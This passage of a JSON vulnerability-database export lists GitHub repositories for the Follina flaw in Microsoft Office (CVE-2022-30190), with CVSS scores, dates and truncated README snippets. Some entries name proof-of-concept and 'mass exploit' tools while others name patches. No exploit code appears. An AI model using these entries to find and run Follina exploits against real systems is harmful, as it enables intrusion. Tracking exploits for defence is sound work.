"LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T09:30:13", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2022-30190"], "modified": "2022-06-09T12:18:29", "id": "005DDBE6-0F17-58D7-9DC2-4D1F01F2A8FD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-01T23:15:16", "description": "# CVE-2022-30190-Follina-Patch\nThis is a simple program allows y...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T13:43:20", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-01T22:07:49", "id": "A4440EF1-5891-5FCD-BA92-DD2B6E54C7F0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-02T02:23:19", "description": "# Follina - CVE-2022-30190\n\nFollina is a zero day allowing code ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, 
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T15:39:20", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-02T00:23:18", "id": "8516D742-8A1C-521C-8372-26BA9FBA2200", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-02T22:59:27", "description": "# CVE-2022-30190-mass-rce\nCVE-2022-30190 Zero click rce Mass Exp...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T17:28:27", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-02T17:31:11", "id": "75389328-1B05-5056-B8C0-C624BF0343AD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-05T12:12:49", "description": "# CVE-2022-30190-follina\nJust another PoC for the new MSDT-Explo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T11:37:08", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-05T08:34:35", "id": "B2474BAA-4133-5059-8F0B-5BAAE9664466", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-02T22:59:07", "description": "# CVE-2022-30190-mass\nCVE-2022-30190 Zero click rce Mass Exploit...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T09:19:34", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T09:39:02", "id": "FAF36735-05C9-50E1-B458-BA2E15B5EB99", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-13T21:21:53", "description": "# cve-2022-30190\nCVE-2022-30190 remediation via removal of ms-ms...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T23:32:33", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-13T20:14:47", "id": "71065DAD-91FD-5CFB-9F35-CA3E1837FF2C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-07T10:58:04", "description": "# MSDT Patcher, a.k.a. CVE-2022-30190-NSIS\nThis is an NSIS scrip...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T18:58:07", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T08:02:05", "id": "5E983FEF-4BE8-5A69-BABE-3CFFC983F1B5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": 
"2022-11-04T08:33:53", "description": "# Follina Proof of Concept (CVE-2022-30190)\n\nQuick and easy \"pro...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T10:47:57", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-11-03T22:18:04", "id": "02FCE52D-5E91-5C57-A40A-DE4FF7C726A3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-27T23:28:50", "description": "# CVE-2022-30190\nCVE-2022-30190 Follina POC\n\n\nHost exploit.html...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T18:58:55", "type": "githubexploit", "title": 
"Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-27T23:24:23", "id": "1CC55581-1C7F-5DA8-A34C-FA125B3D510A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-29T17:28:35", "description": "# CVE-2022-30190\n\n> On Monday May 30, 2022, Microsoft issued CVE...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T18:00:42", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2022-30190"], "modified": "2022-07-29T16:12:57", "id": "FFA2D3A3-AFD4-580B-8424-EE4844976B65", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-23T20:04:43", "description": "# CVE-2022-30190\n**S...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-23T15:24:43", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-23T15:34:15", "id": "E917FE93-F06C-5F70-915F-A5F48A30B044", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-26T19:58:00", "description": "# **_\ud83e\ude79CVE-2022-30190 Temporary Fix\ud83e\ude79_**\nThese are two Python scri...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": 
"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-11T11:16:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T10:21:00", "id": "39D1AD81-7117-5EA3-8421-A33979B77F49", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:00:47", "description": "# CVE-2022-30190(Follina)-PowerPoint-Version\n\nThis is CVE-2022-3...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-29T08:48:12", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-31T12:50:35", "id": "705BFDF7-98C8-5300-AB18-E9EEE465AE5F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:03:26", "description": "[...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-09T09:32:10", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-31T13:05:38", "id": "D70A4D0B-027B-57A1-B882-C70D16FCA9C3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-12T15:35:09", "description": "# CVE-2022-30190\nCVE-2022-30190 Follina POC\n\nHost exploit.html ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T06:45:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-12T13:58:30", "id": "1840A140-1CD9-55F2-A8BD-9B7B27779956", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T05:49:57", "description": "# Compromised clickstudio certificate\n\n__Extracted from__: f3ccf...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-09T10:03:06", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-09T10:06:44", "id": "1E1DD2F1-F609-5686-A0EF-1C08ACABF537", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-02-01T05:35:40", "description": "# MS-MSDT-Office-RCE-Follina\nCVE-2022-30190 | MS-MSDT Follina On...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T16:09:02", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-02-01T03:12:52", "id": "FCCAAA4B-646B-578D-8CE2-5439E7799C32", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-20T17:40:56", "description": "# 
Follina-CVE-2022-30190-Sample-by-ethical-blue\n Educational Fol...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-25T16:27:59", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-20T16:04:27", "id": "37F78533-E96A-5433-B558-90DB82C0BB27", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-16T01:59:21", "description": "# follina-CVE-2022-30190\nfollina zer...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T22:49:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", 
